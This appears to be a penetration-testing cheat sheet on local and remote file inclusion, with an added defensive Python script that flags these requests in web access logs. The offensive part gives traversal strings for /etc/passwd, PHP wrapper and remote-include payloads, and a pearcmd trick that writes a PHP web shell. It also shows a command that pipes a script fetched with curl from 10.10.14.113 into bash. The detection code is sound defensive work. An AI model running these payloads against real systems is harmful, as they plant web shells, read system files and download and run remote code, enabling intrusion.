LFI/RFI

Direct file path traversal
../../../../../../../../etc/passwd
data://text/plain,<?php phpinfo(); ?>
http://atacker.com/mal.php

ffuf -u https://host.htb/?file=FUZZ -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -ic -c -ac -k -H 'Cookie: PHPSESSID=l5l8ad3k06f2h9493eqgtn9ppb'

Dealing with ‘.php’ added to the page name
../../../../../../../../etc/passwd%00
../../../../../../../../usr/local/lib/php/pearcmd

Example for pearcmd
curl --path-as-is 'http://host/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=`$_GET\[0\]`?>+payload.php'
curl --path-as-is 'http://host/payload.php?0=id'

cat <<'EOF'| tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n'
curl 10.10.14.113/r.sh|bash
EOF

# curl --path-as-is 'http://host/payload.php?0=curl+10.10.14.113%2Fr.sh%7Cbash'
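
Detection-side view of the requests above, as an added example that is not part of the original notes: a Python scan of web access-log lines for the traversal, null-byte, wrapper, remote-include and pearcmd indicators listed here. The log lines, rule names and the extra wrapper schemes (php, expect, phar) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rule names are illustrative; patterns run on the fully URL-decoded request target.
RULES = {
    "path_traversal": re.compile(r"(?:\.\.[/\\]){2,}"),
    "null_byte": re.compile(r"\x00"),
    # data:// is from the notes; php/expect/phar are other PHP wrappers (added here).
    "stream_wrapper": re.compile(r"[?&][^=&]*=(?:data|php|expect|phar)://", re.I),
    # Can also match legitimate redirect parameters; tune per application.
    "remote_include": re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.I),
    "pearcmd": re.compile(r"pearcmd", re.I),
    # '+' separates argv entries when the query string is handed to pearcmd.
    "pear_config_create": re.compile(r"[?&+ ]config-create[+ ]", re.I),
}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 1024',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=1?>+x.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /?file=data://text/plain,test HTTP/1.1" 200 80',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /?file=http://example.test/x.txt HTTP/1.1" 200 80',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /?page=about HTTP/1.1" 200 2048',
]

def decode(target, rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e) are seen too."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return the sorted names of the rules that match one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    target = decode(match.group(1))
    return sorted(name for name, rule in RULES.items() if rule.search(target))

def scan(lines):
    """Map line index -> matched rule names, skipping lines with no hits."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG).items():
        print(index, ", ".join(hits))
```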

WebShells